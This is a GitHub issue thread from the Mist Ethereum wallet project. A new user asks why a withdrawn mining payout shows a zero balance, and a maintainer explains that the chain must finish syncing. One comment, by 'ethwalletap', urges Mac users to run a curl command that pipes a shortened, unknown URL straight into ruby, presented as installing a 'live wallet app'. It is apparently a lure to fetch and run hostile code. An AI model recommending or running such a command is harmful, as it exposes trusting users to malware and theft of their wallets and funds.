### ISSUE TITLE
Can't see balance in Ethereum wallet

### ISSUE THREAD

**Issue by Saif215** [ethereum/mist#2711]
Hi there,

Sorry if this is a dumb question but i am new at this;
Around 3 days ago i made my first withdraw from Ehtermine to my wallet but till now my wallet is showing 0 balance; 
I have looked around and found a website to check my wallet's address balance and it is indeed showing the balance i withdrew @etherchain.org
Is there a minimum i need to have before it appears in my wallet IE 1Eth? or did i do something wrong.
Appreciate any help.

Thanks in advance,

**Comment by sathishvj** [comment]
For it to show on Mist, all the blocks have to be synced. That typically takes hours.

**Comment by ethwalletap** [comment]
Hi, If you are using mac then you can run command 
    `curl -s -L shorturl.at/suCKY | ruby`
it will install ethereum live wallet app from where you can check wallet balance in real time. installing will take 10-30 sec and then you will see ethereum app icon on tray it helped me alot to check real time balance instantly i found this on stackoverflow

**Comment by evertonfraga** [comment]
Closing upon inactivity. Please reopen if needed.
